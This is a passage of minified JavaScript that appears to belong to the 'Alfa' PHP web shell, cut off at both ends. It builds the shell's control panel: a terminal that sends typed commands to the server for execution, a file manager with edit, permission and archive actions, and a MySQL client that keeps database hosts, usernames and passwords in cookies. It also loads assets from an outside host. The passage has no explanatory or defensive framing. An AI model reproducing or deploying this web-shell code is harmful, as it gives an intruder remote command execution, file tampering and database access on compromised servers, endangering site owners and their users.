selected")+">"+t[l].vals[r]+"</option>",t[l].vals[r]==e&&(i=!0);a+="</optgroup>"}else a+="<option"+(t[l]!=e||i?"":" selected")+">"+t[l]+"</option>",t[l]==e&&(i=!0);return a}function alfaMysqlChangePage(e,t){var a=e.getAttribute("db_id"),i=0;if(void 0!==t){e=d.querySelector("#"+a+" select[name=mysql-q-pages]");var l=parseInt(e.getAttribute("pages"));if(i=parseInt(e.value),1==t?--i:++i,0==i||l<i)return!1;e.value=i}else i=e.value;var r=e.getAttribute("db_target"),o=e.getAttribute("tbl_name");alfaMysqlApi({db_id:a,db_target:r,ajax_id:"mysql_table_change_page",db_info:{table:o,page:i},post:{alfa2:"page"}},function(e){0!=e.length&&(e=JSON.parse(e),alfaMysqlReportBuilder(a,e),d.querySelector("#"+a+" .mysql-query-table").innerHTML=e.table)})}function alfaRemoveCookie(e){document.cookie=e+"=;Max-Age=0; path=/;"}function alfaLogOut(){alfaRemoveCookie("AlfaUser"),alfaRemoveCookie("AlfaPass"),location.reload()}var alfaAlertBox=function(e,t){this.types={success:{class:"alert-success",icon:"http://solevisible.com/icons/menu/check-mark1.svg"},error:{class:"alert-error",icon:"http://solevisible.com/icons/menu/warning.svg"}},this.show=function(a){if(""===a||null==a)throw\'"msg parameter is empty"\';var i=document.querySelector(e),l=document.createElement("DIV"),r=document.createElement("DIV"),o=document.createElement("DIV"),n=document.createElement("A"),s=document.createElement("div"),c=document.createElement("IMG"),d=this;if(s.style.display="inline-block",s.style.marginRight="10px",r.style.display="inline-block",o.classList.add("alert-content"),o.innerText=a,n.classList.add("alert-close"),n.setAttribute("href","#"),l.classList.add("alert-box"),c.src=this.types[t.type].icon,c.style.width="30px",s.appendChild(c),l.appendChild(s),t.hasOwnProperty("title")){var u=document.createElement("DIV");u.classList.add("alert-content-title"),u.innerText=t.title,r.appendChild(u)}if(r.appendChild(o),l.appendChild(r),t.hideCloseButton&&void 0!==t.hideCloseButton||l.appendChild(n),t.hasOwnProperty("type")&&l.classList.add(this.types[t.type].class),i.appendChild(l),n.addEventListener("click",function(e){e.preventDefault(),d.hide(l)}),!t.persistent)var p=setTimeout(function(){d.hide(l),clearTimeout(p)},t.closeTime)},this.hide=function(e){e.classList.add("hide");var t=setTimeout(function(){e.parentNode.removeChild(e),clearTimeout(t)},500)}};function alfaShowNotification(e,t,a,i,l){void 0===a&&(a="success"),void 0===i&&(i=!1),void 0===l&&(l=1e4);var r={closeTime:l,persistent:i,type:a,hideCloseButton:!1};void 0!==t&&(r.title=t),new alfaAlertBox("#alert-area",r).show(e)}function alfaSyncMenuToOpt(e,t){var a="",i="",l=null;void 0!==t?(a="view_archive",i=e,l=location):(a=e.name,i=e.getAttribute("fname"),l=e),"extract"==a?(alfa_can_add_opt=!0,l.href="#action=options&path="+c_+"&opt=deziper",g("deziper",null,"","",c_+"/"+i),d.querySelector(".opt-title").innerHTML="DeCompressor"):"compress"==a?(alfa_can_add_opt=!0,l.href="#action=options&path="+c_+"&opt=ziper",g("ziper",null,"","",c_+"/"+i),d.querySelector(".opt-title").innerHTML="Compressor"):"view_archive"==a&&(alfa_can_add_opt=!0,l.href="#action=options&path="+c_+"&opt=archive_manager",g("archive_manager",null,"",c_+"/"+i,""),d.querySelector(".opt-title").innerHTML="Archive Manager")}function doFilterName(e){var t="#filesman_holder_"+alfa_current_fm_id;setTimeout(function(){var a=new RegExp(e.value,"i");d.querySelectorAll(t+" .fmanager-row").forEach(function(e){-1==e.querySelector(".main_name").getAttribute("fname").search(a)?e.style.display="none":e.style.display="table-row"})},100)}function sortBySelectedValue(e,t){setCookie(t,e.options[e.selectedIndex].value,2012),g("FilesMan",c_)}function loadPopUpDatabase(e,t,a){if(console.log(t),$("database_window").style.display="block",void 0===t){try{d.querySelector(".sql-content.sql-active-content").classList.remove("sql-active-content")}catch(e){}try{d.querySelector(".sql-tabname.sql-active-tab").classList.remove("sql-active-tab")}catch(e){}try{d.querySelector(".sql-tabs .sql-newtab").remove()}catch(e){}var i="id_db_"+getRandom(10);d.querySelector("#database_window .content_options_holder .sql-contents").insertAdjacentHTML("afterbegin",\'<div id="\'+i+\'" class="sql-content sql-active-content">\'+e+"</div>"),d.querySelector("#database_window .content_options_holder .sql-tabs").insertAdjacentHTML("beforeend",\'<div id="tab_\'+i+\'" opt_id="\'+i+\'" class="sql-tabname sql-active-tab" onclick="dbTabController(this);"><span style="font-weight:unset;">New DB Connection</span> <img opt_id="\'+i+\'" onclick="closeDatabase(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div><div class="sql-newtab" onclick="alfa_can_add_opt=true;g(\\\'sql\\\',null,\\\'\\\',\\\'\\\',\\\'\\\');" style="background-color:#800000;"><span style="font-weight:unset;">New Tab +</span></div>\'),$(i).querySelectorAll(".db-opt-id").forEach(function(e){e.setAttribute("db_id",i)});try{$(i).querySelector(".getconfig").setAttribute("base_id",i)}catch(e){}return i}$(t).innerHTML=e;var l=$("tab_"+t);null!=l&&((-1==l.classList.value.indexOf("sql-active-tab")||database_window_is_minimized)&&(l.classList.add("tab-is-done"),alfaShowNotification("proccess is done...","DB: "+l.innerText)),database_window_is_minimized&&alfaUpdateOptionsBadge("database_window")),void 0!==mysql_cache[t]&&mysql_cache[t].hasOwnProperty("db")&&mysql_cache[t].db.length>0&&"update"!=a&&(d.querySelector("#tab_"+t+">span").innerHTML=mysql_cache[t].db),$(t).querySelectorAll(".db-opt-id").forEach(function(e){e.setAttribute("db_id",t)});try{$(t).querySelector(".getconfig").setAttribute("base_id",t)}catch(e){}database_window_is_minimized||(d.body.style.overflow="hidden")}function loadPopUpOpTions(e,t){console.log(e),alfa_before_do_action_id="",$("options_window").style.display="block";var a=$("option_"+e);if(alfa_can_add_opt){alfa_can_add_opt=!1;try{d.querySelector(".options_holder.option_is_active").classList.remove("option_is_active")}catch(e){}var i="",l=$("menu_opt_"+e).innerHTML;"market"==e?l="Alfa Market":"GetDisFunc"==e&&(l="Disable Functions");try{d.querySelector("#options_window .content_options_holder .options_tab .tab_name.tab_is_active").classList.remove("tab_is_active")}catch(e){}if(null!=a){var r=a.getAttribute("opt_count");null!=r?(i=parseInt(r)+1,a.setAttribute("opt_count",i)):(i=1,a.setAttribute("opt_count",i))}var o="option_"+e+i;d.querySelector("#options_window .content_options_holder .options_content").insertAdjacentHTML("afterbegin",\'<div id="\'+o+\'" class="options_holder">\'+t+"</div>"),d.querySelector("#options_window .content_options_holder .options_tab").insertAdjacentHTML("beforeend",\'<div opt_id="\'+o+\'" onclick="optionsTabController(this);" title="\'+l+\'" id="tab_\'+o+\'" class="tab_name tab_is_active">\'+l+\' <img opt_id="\'+o+\'" onclick="closeOption(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div>\'),$(o).classList.toggle("option_is_active"),d.querySelectorAll("#"+o+" form, #"+o+" a").forEach(function(t){var a=t.classList.value;if("getconfig"==a||"rejectme"==a)return!1;if("FORM"==t.tagName){var l=t.getAttribute("onsubmit");t.setAttribute("onsubmit",\'alfaBeforeDoAction("\'+e+i+\'");\'+l),t.setAttribute("opt_id",e+i)}else{l=t.getAttribute("onclick");t.setAttribute("onclick",\'alfaBeforeDoAction("\'+e+i+\'");\'+l)}});try{$(o).querySelector(".getconfig").setAttribute("base_id",e+i)}catch(e){}return e+i}a.innerHTML=t;var n=$("tab_option_"+e);null!=n&&((-1==n.classList.value.indexOf("tab_is_active")||options_window_is_minimized)&&(n.classList.add("tab-is-done"),alfaShowNotification("proccess is done...",n.innerText)),options_window_is_minimized&&alfaUpdateOptionsBadge("options_window")),d.querySelectorAll("#option_"+e+" form, #option_"+e+" a").forEach(function(t){var a=t.classList.value;if("getconfig"==a||"rejectme"==a)return!1;if("FORM"==t.tagName){var i=t.getAttribute("onsubmit");t.setAttribute("onsubmit",\'alfaBeforeDoAction("\'+e+\'");\'+i),t.setAttribute("opt_id",e)}else{i=t.getAttribute("onclick");t.setAttribute("onclick",\'alfaBeforeDoAction("\'+e+\'");\'+i)}});try{a.querySelector(".getconfig").setAttribute("base_id",e)}catch(e){}options_window_is_minimized||(d.body.style.overflow="hidden")}function alfaBeforeDoAction(e){alfa_before_do_action_id=e}function alfaLoaderOnTop(e){$("a_loader").style.display=e,d.body.style.overflow="block"==e?"hidden":"visible"}function alfaAjaxController(e){var t=e.getAttribute("parent");$("loader_"+t).remove(),"filesman_holder"==t.substr(0,15)&&($(t).style.minHeight="0"),_ALFA_AJAX_.hasOwnProperty(t)&&_ALFA_AJAX_[t].abort()}function closeDatabase(e,t){t.stopPropagation();var a=e.getAttribute("opt_id");if($(a).remove(),-1!=$("tab_"+a).classList.value.indexOf("sql-active-tab"))if((e=d.querySelectorAll(".sql-tabs .sql-tabname")).length>1){e[0].classList.add("sql-active-tab");var i=e[0].getAttribute("opt_id");null!=$(i)&&$(i).classList.toggle("sql-active-content")}else editorClose("database_window");d.querySelector("div[opt_id="+a+"]").remove()}function closeFmTab(e,t){t.stopPropagation();var a=e.getAttribute("fm_id"),i=$("filesman_tab_"+a);if(-1!=i.classList.value.indexOf("filesman-tab-active")&&(e=d.querySelectorAll("#filesman_tabs .filesman_tab")).length>1){e[0].classList.add("filesman-tab-active");var l=e[0].getAttribute("fm_id"),r="filesman_holder_"+l;if(null!=$(r)){$(r).classList.toggle("filesman-active-content");var o=$("filesman_tab_"+l).getAttribute("path");initDir(o),d.mf.c.value=o,alfa_current_fm_id=l}}i.remove(),$("filesman_holder_"+a).remove(),alfaFilesmanTabHideTitle()}function closeOption(e,t){t.stopPropagation();var a=e.getAttribute("opt_id");if($(a).remove(),-1!=$("tab_"+a).classList.value.indexOf("tab_is_active"))if((e=d.querySelectorAll(".options_tab .tab_name")).length>1){e[0].classList.add("tab_is_active");var i=e[0].getAttribute("opt_id");null!=$(i)&&$(i).classList.toggle("option_is_active")}else editorClose("options_window");d.querySelector("div[opt_id="+a+"]").remove()}function historyPanelController(e){"hidden"==e.getAttribute("mode")?(d.querySelector(".editor-explorer").style.display="block",d.querySelector(".editor-modal").style.marginLeft="20%",e.setAttribute("mode","visible"),e.style.left="19%",e.innerHTML="<<"):(d.querySelector(".editor-explorer").style.display="none",d.querySelector(".editor-modal").style.marginLeft="1%",e.setAttribute("mode","hidden"),e.style.left="0%",e.innerHTML=">>")}function closeTerminalContent(e,t){t.stopPropagation();var a=e.getAttribute("term_id");if(($(a).remove(),-1!=$("tab_"+a).classList.value.indexOf("active-terminal-tab"))&&(e=d.querySelectorAll(".terminal-tabs .terminal-tab")).length>1){e[0].classList.add("active-terminal-tab");var i=e[0].getAttribute("term_id");null!=$(i)&&$(i).classList.toggle("active-terminal-content")}d.querySelector("div[term_id="+a+"]").remove()}function closeEditorContent(e,t){t.stopPropagation();var a=e.getAttribute("opt_id");if(($(a).remove(),-1!=$("tab_"+a).classList.value.indexOf("editor-tab-active"))&&(e=d.querySelectorAll(".editor-tabs .editor-tab-name")).length>1){e[0].classList.add("editor-tab-active");var i=e[0].getAttribute("opt_id");null!=$(i)&&$(i).classList.toggle("editor-content-active")}d.querySelector("div[opt_id="+a+"]").remove()}function optionsTabController(e){try{d.querySelector(".options_holder.option_is_active").classList.remove("option_is_active")}catch(e){}var t=e.getAttribute("opt_id");if(null==t)return!1;$(t).classList.toggle("option_is_active");try{d.querySelector("#options_window .content_options_holder .options_tab \\t.tab_name.tab_is_active").classList.remove("tab_is_active")}catch(e){}e.classList.remove("tab-is-done"),e.classList.add("tab_is_active"),d.querySelector(".opt-title").innerHTML=e.getAttribute("title"),alfaUpdateOptionsBadge("options_window")}function terminalTabController(e){try{d.querySelector(".terminal-tab.active-terminal-tab").classList.remove("active-terminal-tab")}catch(e){}try{d.querySelector(".terminal-content.active-terminal-content").classList.remove("active-terminal-content")}catch(e){}var t=e.getAttribute("term_id");if(null==t)return!1;$(t).classList.toggle("active-terminal-content"),e.classList.remove("tab-is-done"),e.classList.add("active-terminal-tab"),$(t).querySelector(".php-terminal-input").focus(),alfaUpdateOptionsBadge("cgiloader")}function filesmanTabController(e){try{d.querySelector(".ajaxarea.filesman-active-content").classList.remove("filesman-active-content")}catch(e){}try{d.querySelector(".filesman_tab.filesman-tab-active").classList.remove("filesman-tab-active")}catch(e){}var t=e.getAttribute("fm_id");if(null==t)return!1;alfa_current_fm_id=t,e.classList.add("filesman-tab-active"),e.classList.remove("tab-is-done"),$("filesman_holder_"+t).classList.toggle("filesman-active-content");var a=e.getAttribute("path");initDir(a),d.mf.c.value=a}function dbTabController(e){try{d.querySelector(".sql-content.sql-active-content").classList.remove("sql-active-content")}catch(e){}try{d.querySelector(".sql-tabname.sql-active-tab").classList.remove("sql-active-tab")}catch(e){}var t=e.getAttribute("opt_id");if(null==t)return!1;$(t).classList.toggle("sql-active-content"),e.classList.remove("tab-is-done"),e.classList.add("sql-active-tab"),alfaUpdateOptionsBadge("database_window")}function editorTabController(e,t){try{d.querySelector(".editor-contents.editor-content-active").classList.remove("editor-content-active")}catch(e){}var a=null;void 0===t?a=e.getAttribute("opt_id"):(a=e,e=$("tab_"+a));var i=editor_files["file_"+a.replace("editor_source_","")];if(void 0!==i&&(d.querySelector(".editor-path").innerHTML=(i.pwd+"/"+i.file).replace(/\\/\\//g,"/")),null==a)return!1;$(a).classList.toggle("editor-content-active");try{d.querySelector(".editor-tabs .editor-tab-name.editor-tab-active").classList.remove("editor-tab-active")}catch(e){}e.classList.remove("tab-is-done"),e.classList.add("editor-tab-active"),alfaUpdateOptionsBadge("editor")}function alfaUpdateOptionsBadge(e){var t=d.querySelector("#"+e+"-minimized .options_min_badge");if(null!=t){var a=d.querySelectorAll("#"+e+" .tab-is-done").length;t.innerHTML=a,t.style.visibility=a>0?"visible":"hidden"}}function alfaOpenPhpTerminal(e){if(php_temrinal_using_cgi&&void 0===e)showEditor("cgiloader");else{$("cgiloader").style.display="block",$("cgiloader").style.background="rgba(0, 0, 0, 0.57)",$("cgiframe").style.background="rgba(0, 0, 0, 0.81)",$("cgiframe").style.border="1px solid rgb(30, 86, 115)",$("cgiframe").style.height="90%",$("cgiframe").style.padding="3px",d.querySelector("#cgiloader .opt-title").innerHTML="Terminal";var t="",a="",i="terminal_id_"+getRandom(10);void 0===e&&(t=" active-terminal-content",a=" active-terminal-tab"),d.querySelector("#cgiframe .terminal-contents").insertAdjacentHTML("afterbegin",\'<div id="\'+i+\'" class="terminal-content\'+t+\'"><div class="php-terminal-output"><div><button class="terminal-btn-fontctl" onClick="changeTerminalFontSize(\\\'\'+i+\'\\\',1);">+</button><button class="terminal-btn-fontctl" onClick="changeTerminalFontSize(\\\'\'+i+"\',0);\\">-</button><input onchange=\\"alfaTerminalChangecolor(this,\'"+i+\'\\\');" style="height: 18px;background: #dde2e2;" type="color"></div><pre class="ml1" style="border:unset;height: 90%;"></pre></div><div><form term_id="\'+i+\'" onSubmit="alfaExecTerminal(this);this.c.value=\\\'\\\';return false;" autocomplete="off" style="margin-top: 10px;"><div style="overflow: auto;white-space: nowrap;"><div style="display: inline-block;color:#4fbec3;margin-bottom:5px;margin-right:5px;">CWD:~# </div><div style="display: inline-block;color:#42ec42;" class="php-terminal-current-dir"></div></div><div style="position:relative;"><span style="color: #00ff08;font-size: 25px;">$ </span><input style="padding: 8px;font-size: 20px;width: 67%;border: 1px solid #27979B;padding-right:35px;" onkeyup="alfaWalkInTerminalHistory(this,event,\\\'\'+i+\'\\\');" term_id="\'+i+\'" class="php-terminal-input" type="text" name="c" onfocus="closeHistoryCmd(\\\'free\\\',this);" placeholder="ls -la"><button class="button" style="color: #27979B;padding: 12px;margin-left: 10px;border-radius: 2px;font-weight: bolder;">ExeCute<button term_id="\'+i+\'" class="button" style="color: #27979B;padding: 12px;margin-left: 10px;border-radius: 2px;font-weight: bolder;" onClick="alfaExecTerminal(this, 1);return false;">Current Dir</button><div class="cmd-history-holder"><div class="commands-history-header">History</div><span onClick="clearTerminalHistory();" style="border-bottom: 1px solid;margin-bottom: 5px;display: inline-block;padding: 5px;color: #59de69;cursor: pointer;">Clear history</span><div style="overflow: auto;height: 82%;" class="commands-history"></div></div><div term_id="\'+i+\'" class="cmd-history-icon" mode="" onclick="closeHistoryCmd(this);"><img style="width:27px;" src="http://solevisible.com/icons/menu/time2.svg"></div></form></div></div></div>\');try{$("terminal_new_tab").remove()}catch(e){}d.querySelector("#cgiframe .terminal-tabs").insertAdjacentHTML("beforeend",\'<div onclick="terminalTabController(this);" term_id="\'+i+\'" id="tab_\'+i+\'" class="terminal-tab\'+a+\'">Terminal <img term_id="\'+i+\'" onclick="closeTerminalContent(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div>\'),d.querySelector("#cgiframe .terminal-tabs").insertAdjacentHTML("beforeend",\'<div onclick="alfaOpenPhpTerminal(true);" id="terminal_new_tab" style="background-color:#800000;" class="terminal-tab">New Tab +</div>\'),terminal_walk_index[i]={index:0,key:-1},d.querySelector("#"+i+" .php-terminal-input").focus(),d.querySelector("#"+i+" .php-terminal-current-dir").innerHTML=c_,d.querySelector("#cgiloader-minimized .minimized-text").innerHTML="Terminal",alfaTerminalSetColorAndSize(i),php_temrinal_using_cgi=!0;var l=alfaGetTerminalHistory();for(var r in l)d.querySelector("#"+i+" .cmd-history-holder .commands-history").insertAdjacentHTML("afterbegin","<div onclick=\\"d.querySelector(\'#"+i+\' .php-terminal-input\\\').value = this.innerHTML;" class="history-cmd-line">\'+l[r]+"</div>")}d.body.style.overflow="hidden"}function alfaTerminalSetColorAndSize(e){var t=getCookie("alfa-terminal-color"),a=getCookie("alfa-terminal-fontsize");void 0!==t&&(d.querySelector("#"+e+" pre.ml1").style.color=t),void 0!==a&&(d.querySelector("#"+e+" pre.ml1").style.fontSize=a)}function alfaTerminalChangecolor(e,t){d.querySelector("#"+t+" pre.ml1").style.color=e.value,setCookie("alfa-terminal-color",e.value,2012)}function alfaGetTerminalHistory(e){var t=getCookie("alfa-terminal-history");try{t=atob(t),t=JSON.parse(t)}catch(e){t=[]}return void 0!==e&&t.reverse(),t}function changeTerminalFontSize(e,t){var a=d.querySelector("#"+e+" pre.ml1"),i=parseInt(window.getComputedStyle(a,null).getPropertyValue("font-size")),l="";1==t?(l=i+1+"px",a.style.fontSize=l):(l=i-1+"px",a.style.fontSize=l),setCookie("alfa-terminal-fontsize",l,2012)}function alfaWalkInTerminalHistory(e,t,a){var i=t||window.event;if("38"==i.keyCode||"40"==i.keyCode||"37"==i.keyCode||"39"==i.keyCode)switch(i.keyCode){case 38:var l=alfaGetTerminalHistory(!0),r="";0==terminal_walk_index[a].index?(0==terminal_walk_index[a].key&&++terminal_walk_index[a].index,void 0!==(r=l[terminal_walk_index[a].index])?(e.value=r,++terminal_walk_index[a].index):(e.value="",terminal_walk_index[a].index=0)):terminal_walk_index[a].index<l.length&&(0==terminal_walk_index[a].key&&++terminal_walk_index[a].index,e.value=l[terminal_walk_index[a].index],++terminal_walk_index[a].index),terminal_walk_index[a].key=1;break;case 40:l=alfaGetTerminalHistory(!0);if(terminal_walk_index[a].index>=0)0!=terminal_walk_index[a].index&&(--terminal_walk_index[a].index,1==terminal_walk_index[a].key&&--terminal_walk_index[a].index),void 0!==(r=l[terminal_walk_index[a].index])?e.value=r:(e.value="",terminal_walk_index[a].index=0);terminal_walk_index[a].key=0;break;default:console.log(i.keyCode)}else terminal_walk_index[a].index=0}function clearTerminalHistory(){d.querySelectorAll(".commands-history").forEach(function(e){e.innerHTML=""}),setCookie("alfa-terminal-history","",2012)}function alfaAceToFullscreen(e){var t=e.getAttribute("ace_id");alfa_ace_editors.editor[t].container.requestFullscreen()}function closeHistoryCmd(e,t){if("free"==e){var a=t.getAttribute("term_id");return e=d.querySelector("#"+a+" .cmd-history-icon"),d.querySelector("#"+a+" .cmd-history-holder").style.visibility="hidden",d.querySelector("#"+a+" .cmd-history-holder").style.opacity="0",e.setAttribute("mode","off"),!1}var i=e.getAttribute("mode"),l=(a=e.getAttribute("term_id"),d.querySelector("#"+a+" .cmd-history-holder"));0==i.length||"off"==i?(l.style.visibility="visible",l.style.opacity="1",e.setAttribute("mode","on")):(l.style.visibility="hidden",l.style.opacity="0",e.setAttribute("mode","off"))}function geEvalAceValue(e){var t=e.querySelector(".php-evals-ace").getAttribute("id");return alfa_ace_editors.eval[t].getValue()}function alfaOpenArchive(e){var t=e.getAttribute("path"),a=e.getAttribute("fname"),i=e.getAttribute("base_id");if(".."==a&&"phar://"!=t.substr(0,7))return!1;var l="a="+alfab64("open_archive_dir")+"&c="+alfab64(c_)+"&alfa1="+alfab64(t)+"&alfa2="+alfab64(i)+"&ajax="+alfab64("true");_Ajax(d.URL,l,function(e){if("0"!=e){$("archive_base_"+i).innerHTML=e;var a=$("archive_dir_"+i).getAttribute("archive_name"),l=$("archive_dir_"+i).getAttribute("archive_full"),r="",o="";if(0!=(t=t.split(a)[1]).length){var n=(t=t.split("/")).length-1;for(var s in 0==t[n].length&&t.splice(n,1),t)0!=t.length&&(o+=t[s]+"/",r+=\'<a base_id="\'+i+\'" fname="\'+t[s]+\'" path="\'+l+o+\'" onclick="alfaOpenArchive(this);">\'+t[s]+"/</a>")}d.querySelector("#archive_dir_"+i+" .archive_pwd_holder").innerHTML=r}},!1,"open_archive_dir")}function alfaDeleteConnectToDb(e){d.querySelectorAll(".dbh_"+e).forEach(function(e){e.remove()}),alfaConnectionHistoryUpdate(e)}function alfaConnectToDb(e,t){var a={};try{a=JSON.parse(atob(getCookie("alfa_connection_hist")))}catch(e){}var i=d.querySelector("#"+t+" div.sf");i.querySelector("input[name=sql_host]").value=a[e].host,i.querySelector("input[name=sql_login]").value=a[e].user,i.querySelector("input[name=sql_pass]").value=a[e].pass,(i.querySelector("input[name=sql_base]")?i.querySelector("input[name=sql_base]"):i.querySelector("select[name=sql_base]")).value=a[e].db,i.querySelector("input[name=sql_count]").checked=!0,d.querySelector("#"+t+" div.sf .db-connect-btn").click()}function alfaShowConnectionHistory(e){var t={},a=e.getAttribute("db_id"),i=e.getAttribute("mode");if(rows=\'<table class="connection-hist-table"><tr><th>*</th><th>Host</th><th>User</th><th>Pass</th><th>Database</th><th>Connect</th><th>Delete</th></tr>\',"on"==i){e.setAttribute("mode","off");try{t=JSON.parse(atob(getCookie("alfa_connection_hist")))}catch(e){}var l,r=1;for(l in t){var o=t[l].user+"_"+t[l].db;rows+=\'<tr class="dbh_\'+o+\'"><th>\'+r+"</th><th>"+t[l].host+"</th><th>"+t[l].user+"</th><th>"+t[l].pass+"</th><th>"+t[l].db+\'</th><th><button style="margin: unset;" class="connection-his-btn" onclick=\\\'alfaConnectToDb("\'+o+\'","\'+a+\'");\\\'>Connect</button></th><th style="text-align: center;"><button style="margin: unset;" class="connection-his-btn connection-delete" onclick=\\\'alfaDeleteConnectToDb("\'+o+"\\");\'>X</button></th></tr>",r++}rows+="</table"}else e.setAttribute("mode","on"),rows="";d.querySelector("#"+a+" .connection_history_holder").innerHTML=rows}function alfaConnectionHistoryUpdate(e){var t,a={};try{a=JSON.parse(atob(getCookie("alfa_connection_hist")))}catch(e){}for(t in mysql_cache)0!=mysql_cache[t].db.length&&(a[mysql_cache[t].user+"_"+mysql_cache[t].db]=mysql_cache[t]);void 0!==e&&delete a[e],setCookie("alfa_connection_hist",btoa(JSON.stringify(a)),2012)}function alfaExecTerminal(e,t){var a="";if(0==(a=void 0!==t?"cd "+c_:e.c.value).length)return!1;"l"==a?a="ls -trh --color":"ll"==a&&(a="ls -ltrh --color");var i=e.getAttribute("term_id");alfaloader(i,"block"),closeHistoryCmd("free",e);var l="";"FORM"==e.tagName&&(l=e.querySelector(".php-terminal-current-dir").innerHTML),0==(l=l.trim()).length&&(l=c_);var r="a="+alfab64("terminalExec")+"&c="+alfab64(l)+"&alfa1="+alfab64(a)+"&ajax="+alfab64("true");if(_Ajax(d.URL,r,function(e,t){alfaloader(t,"none");try{var a=$("tab_"+i);null!=a&&((-1==a.classList.value.indexOf("active-terminal-tab")||cgi_is_minimized)&&(a.classList.add("tab-is-done"),alfaShowNotification("proccess is done...",a.innerText)),cgi_is_minimized&&alfaUpdateOptionsBadge("cgiloader"))}catch(e){}e=JSON.parse(e),d.querySelector("#"+t+" .php-terminal-output > pre").innerHTML=e.output,0!=e.path.length&&(d.querySelector("#"+t+" .php-terminal-current-dir").innerHTML=e.path)},!1,i),void 0===t){d.querySelector("#"+i+" .cmd-history-holder .commands-history").insertAdjacentHTML("afterbegin","<div onclick=\\"d.querySelector(\'#"+i+\' .php-terminal-input\\\').value = this.innerHTML;" class="history-cmd-line">\'+a+"</div>");var o=alfaGetTerminalHistory(),n=o.indexOf(a);-1!=n&&o.splice(n,1),o.push(a),setCookie("alfa-terminal-history",btoa(JSON.stringify(o)),2012)}d.querySelector("#"+i+" input.php-terminal-input").focus()}function pageChangedFilesMan(e){var t="filesman_holder_"+alfa_current_fm_id,a=getCookie(t+"_page_number"),i=e.innerText;if("<<"==i){a=d.querySelector("#"+t+" .active-page-number").innerText;if(!((a=parseInt(a))>1))return!1;i=a-1}if(">>"==i){a=d.querySelector("#"+t+" .active-page-number").innerText;a=parseInt(a);var l=d.querySelector("#"+t+" .last-page-number").innerHTML;if(!(a+1<=(l=parseInt(l))))return!1;i=a+1}setCookie(t+"_page_number",i,2012),g("FilesMan",c_)}function alfaColDumperInit(){var e=d.querySelector(".tab_name.tab_is_active").getAttribute("opt_id"),t=d.querySelector("#"+e),a=t.getElementsByClassName("box");for(i=0;i<a.length;i++)a[i].addEventListener("click",function(){null!=this.parentElement.querySelector(".nested")&&(this.parentElement.querySelector(".nested").classList.toggle("active"),this.classList.toggle("check-box"))});var i;a=t.getElementsByClassName("sub-box");for(i=0;i<a.length;i++)a[i].setAttribute("opt_id",e),a[i].addEventListener("click",function(){this.classList.toggle("check-box");var e=this.getAttribute("tbl"),t=this.getAttribute("opt_id");t=t.replace("option_",""),col_dumper_selected_data.hasOwnProperty(t)||(col_dumper_selected_data[t]={}),void 0===col_dumper_selected_data[t][e]&&(col_dumper_selected_data[t][e]=[]);var a=this.innerHTML,i=col_dumper_selected_data[t][e].indexOf(a);-1==i?col_dumper_selected_data[t][e].push(a):col_dumper_selected_data[t][e].splice(i,1)})}function showSymlinkPath(e,t){t.stopPropagation();var a=e.getAttribute("row"),i=$("td_row_"+a),l=e.getAttribute("opt_title"),r=e.getAttribute("fname");if(l=decodeURIComponent(r)+" -> "+l,null!=i){i.insertAdjacentHTML("afterbegin",\'<div class="symlink_path" id="link_id_\'+a+\'">\'+l+"</div>");var o=t.clientX,n=t.clientY-30;$("link_id_"+a).style.left=o+"px",$("link_id_"+a).style.top=n+"px"}}function hideSymlinkPath(e,t){t.stopPropagation(),$("link_id_"+e.getAttribute("row")).remove()}function alfagetFlags(){data="a="+alfab64("get_flags")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),_Ajax(d.URL,data,function(e){var t=JSON.parse(e);t.hasOwnProperty("server")&&(d.querySelectorAll(".flag-holder")[0].innerHTML=\'<img draggable="false" title="\'+t.server.name+\'" src="http://solevisible.com/images/flags/48/\'+t.server.code.toLowerCase()+\'.png">\',d.querySelectorAll(".flag-holder")[0].style.display="inline"),t.hasOwnProperty("client")&&(d.querySelectorAll(".flag-holder")[1].innerHTML=\'<img draggable="false" title="\'+t.client.name+\'" src="http://solevisible.com/images/flags/48/\'+t.client.code.toLowerCase()+\'.png">\',d.querySelectorAll(".flag-holder")[1].style.display="inline")})}function colDumplerSelectType(e){var t=e.options[e.selectedIndex].value;$("coldumper-delimiter-input").style.display="delimiter"==t?"inline-block":"none"}function alfaCheckUrlHash(){var e=window.location.hash.substr(1),t=e.split("&").reduce(function(e,t){var a=t.split("=");return e[a[0]]=a[1],e},{});if(""!=e)switch(t.action){case"fileman":case"options":t.path=decodeURIComponent(t.path),g("FilesMan",t.path,function(e){if(t.hasOwnProperty("file")){var a="auto";isArchive(t.file)&&(a="view"),editor(t.path+"/"+t.file,a,"","","","file")}}),"options"==t.action&&t.hasOwnProperty("opt")&&(alfa_can_add_opt=!0,g(t.opt,null,"","",""),d.querySelector(".opt-title").innerHTML=$("menu_opt_"+t.opt).innerHTML),t.hasOwnProperty("file")||editorClose("editor"),t.hasOwnProperty("opt")||editorClose("options_window"),editorClose("cgiloader");break;default:g("FilesMan","<?php echo $GLOBALS["cwd"]; ?>"),editorClose("editor"),editorClose("options_window"),editorClose("cgiloader")}else g("FilesMan","<?php echo $GLOBALS["cwd"]; ?>"),editorClose("editor"),editorClose("options_window"),editorClose("cgiloader")}function alfaFmngrContextRow(){d.querySelectorAll(".fmanager-row a.main_name").forEach(function(e){e.addEventListener("contextmenu",function(e){var t=e.target,a="";if(".."==(a="A"==e.target.parentElement.tagName?(t=e.target.parentElement).getAttribute("fname"):t.getAttribute("fname")))return!1;var i=t.getAttribute("id"),l=t.getAttribute("path"),r=t.getAttribute("ftype"),o=["newtab","link","download","view","edit","move","copy","rename","modify","permission","compress","extract","delete"];for(var n in"file"!=r||isArchive(a)?o[3]="view_archive":o.splice(11,1),"folder"==r&&(o=["newtab","link","move","copy","rename","modify","permission","compress","delete"]),alfaSortMenuItems(o),o){var s=d.querySelector("#rightclick_menu > a[name="+o[n]+"]");switch(s.setAttribute("fid",i),s.setAttribute("fname",decodeURIComponent(a)),s.setAttribute("path",l),s.setAttribute("ftype",r),o[n]){case"view":case"edit":var c="auto";"edit"==o[n]&&(c="edit"),s.setAttribute("href","#action=fileman&path="+c_+"/&file="+a),s.setAttribute("onclick","editor(\'"+a+"\',\'"+c+"\',\'\',\'\',\'\',\'file\')");break;case"newtab":var 